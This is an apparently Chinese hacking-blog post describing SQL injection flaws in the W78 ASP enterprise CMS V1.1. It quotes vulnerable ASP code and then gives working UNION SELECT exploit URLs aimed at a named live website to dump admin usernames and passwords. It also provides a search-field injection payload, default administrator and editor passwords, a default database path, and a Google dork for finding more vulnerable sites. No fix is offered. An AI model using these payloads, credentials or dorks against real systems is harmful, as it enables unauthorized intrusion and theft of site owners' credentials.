W78CMS SQL注入漏洞

2010, April 3, 7:14 PM. 漏洞分析
Submitted by admin

W78企业ASP网站管理系统V1.1的SQL注入
程序发布日期:2010年03月18日.
裸奔的系统。
1.shopmore.asp

set rs=server.createobject("adodb.recordset")
exec="select * from [shop] where ssfl="& request.QueryString("id") &" order by id desc  "
rs.open exec,conn,1,1
if rs.eof then
response.Write " 该分类暂无产品!"
else
rs.PageSize =20 '每页记录条数
iCount=rs.RecordCount '记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request("page")
if Not IsNumeric(page) or page="" then
page=1
2.about.asp

exec="select * from [about] where id="& request.QueryString("id")
set rs=server.createobject("adodb.recordset")
rs.open exec,conn,1,1

3.search_news.asp

dim title
title=request.form("form_news")
set rs=conn.execute("select * from [news] where title like '%"&title&"%'")
if title="" then
response.write ("<script language=""javascript"">alert(""请输入关键字!"");history.go(-1);</script>")
end if
if rs.eof then
response.write ("<script language=""javascript"">alert(""没有搜索到相关内容!"");history.go(-1);</script>")

还有其他的页面。

4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试

后台默认密码为86779533 abc123这两个

试试数据库默认地址为/data/%23sze7xiaohu.mdb

exp:http://www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201,admin,3,password,5,6%20from%20admin

http://www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

搜索型注入:%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='

Google:inurl:ShopMore.asp?id

Tags: w78cms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
W78CMS 漏洞拿shell (浏览: 14904, 评论: 0)
W78CMS企业网站管理系统 v2.6.1 注射 (浏览: 9564, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):